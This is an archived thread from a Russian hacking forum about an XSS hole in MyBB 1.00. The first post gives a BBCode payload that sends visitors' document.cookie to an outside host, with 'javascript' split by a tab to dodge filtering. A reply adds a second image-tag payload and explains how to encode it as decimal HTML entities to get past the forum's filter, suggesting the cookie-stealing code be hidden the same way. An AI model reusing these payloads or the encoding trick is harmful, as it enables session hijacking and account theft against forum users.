Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   XSS в MyBB (MyBulletinBoard 1.00) (https://forum.antichat.xyz/showthread.php?t=4760)

Algol 14.01.2005 18:44
XSS в MyBB (MyBulletinBoard 1.00)
 
Эксплоит
Код HTML:
[url=" style=`background:url(javaS        cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]
javascript через табуляцию

Проверялось в форуме
http://mybboard.com/community/

néM3S!s 05.01.2006 14:14
Excellent ! :)

ThX Algol

Romaxa55 05.01.2006 21:48
Спасибо, но мне кажется я гдето это видел... а не на секьюри?

Ricky 06.01.2006 01:48
Цитата:
Сообщение от Algol
Эксплоит
Код HTML:
[url=" style=`background:url(javaS        cript:i=new Image()\;i.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie)`]ssssssss[/url]
javascript через табуляцию

Проверялось в форуме
http://mybboard.com/community/
А зачем тебе обратный слеш \; ?

Кстати если написать вот так,

Код HTML:
[img]http://www.wj"'='.gif[/img]'style=background:url('javascript:alert(/wj/)');
То будет работать во всех трех браузерах, Опера, Фаерфокс и ИЕ. Но так как Фаерфокс имеет автоматическую защиту, то алерт выскочит только в ИЕ и Опере.

Строку,

Цитата:
background:url('javascript:alert(/wj/)');
Нужно закодировать Юникодом UTF-8 используя эту ссылку.

http://ha.ckers.org/xss.html

Там где говориться
Цитата:
Decimal Value:
Так как произойдет фильтрация.

Будет это все выглядеть типа вот так,

Код HTML:
[img]http://www.wj"'='.gif[/img]'style=&#98&#97&#99&#107&#103&#114&#111&#117&#110&#100&#58&#117&#114&#108&#40&#39&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#47&#119&#106&#47&#41&#39&#41&#59
Только после каждого символа, теперь надо поставить точку с запятой. (;)

Код для воровки кук, можно взять от Алгола и так же его закодировать. :rolleyes:


Время: 18:48